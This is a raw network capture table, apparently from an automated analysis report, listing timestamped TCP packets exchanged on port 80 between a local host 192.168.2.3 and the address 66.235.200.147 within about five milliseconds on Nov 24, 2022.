Nov 24, 2022 12:20:03.367547035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367563009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367571115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367584944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367595911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367610931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367621899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367636919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367646933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367657900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367671967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367685080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367695093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367710114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367718935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367733002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367750883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367769003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367773056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367788076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367791891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367813110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367814064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367831945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367835045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367850065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367863894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367870092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367889881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367896080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367896080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367911100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367916107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367929935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367932081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367948055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367950916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367963076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367976904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367995977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368014097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368020058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368031979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368048906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368050098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368072033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368088961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368091106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368103027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368109941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368128061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368130922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368146896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368158102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368166924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368180990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368187904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368197918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368208885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368216991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368227959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368233919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368244886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368252993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368264914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368277073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368283987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368290901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368304014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368309021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368324995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368329048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368343115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368343115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368359089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368362904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368376970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368381977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368400097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368417025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368422031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368437052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368447065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368455887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368474007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368474007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368498087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368527889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368546963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368566036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368585110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368594885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368613958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368628025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.368629932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.368669987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369138002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369173050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369193077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369213104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369234085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369251966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369302988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369323015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369342089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369369984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369376898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369391918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369396925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369421959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369434118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369492054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369510889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369539022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369543076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369554996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369617939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369663000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369767904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369787931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369807959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369828939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369842052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369848967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369860888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369868040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369887114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369894028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369908094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369920015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369925976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369945049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369946003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369965076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369972944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.369983912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.369996071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370001078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370018005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370021105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370033979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370035887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370053053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370059013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370071888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370085955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370090961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370102882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370110035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370117903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370126963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370137930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370145082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370155096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370163918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370172977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370182037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370193005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370199919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370212078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370218039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370228052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370235920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370245934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370255947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370263100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370274067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370284081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370292902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370301008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370310068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370320082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370327950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370337009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370346069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370357037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370367050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370373964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370388031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370393038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370407104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370410919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370424032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370428085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370444059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370448112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370461941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370464087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370480061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370482922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370500088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370501041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370515108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370518923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370532990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370537996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370551109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370553970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370568991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370572090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370587111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370587111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370604038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370605946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370625973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370625973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370646000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370651007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370663881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370665073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370678902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370682955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370698929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370701075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370719910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370738029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370743990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370743990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370762110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370763063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370780945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370798111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370804071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370804071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370815992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370816946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370832920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370836973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370851040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370856047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370872974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370873928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370896101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370906115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370925903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370945930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370950937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370965958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.370975971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.370985985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371004105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371004105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371025085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371027946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371042967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371052980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371062040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371071100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371081114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371088982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371098995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371105909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371117115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371123075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371135950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371140003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371155024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371159077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371172905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371176958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371191978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371193886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371210098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371212959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371227980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371228933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371243954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371247053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371265888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371267080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371283054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371284962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371300936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371304989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371321917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371324062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371344090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371345997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371361971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371362925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371376991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371381998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371402025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371404886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371427059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371432066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371444941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371449947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371463060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371469975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371481895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371484995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371500015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371501923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371519089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371522903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371536970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371541977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371556044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371562004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371575117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371575117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371591091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371593952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371606112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371612072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371630907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371635914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371649027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371659040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371668100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371670961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371686935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371687889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371705055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371707916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371722937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371725082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371741056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371745110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371761084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371762991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371778965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371782064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371799946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371809006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371819973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371824026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371838093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371841908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371859074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371861935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371876955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371881008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371901035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371901989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371915102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.371920109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371938944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371963978 CET	49710	80	192.168.2.3	66.235.200.147
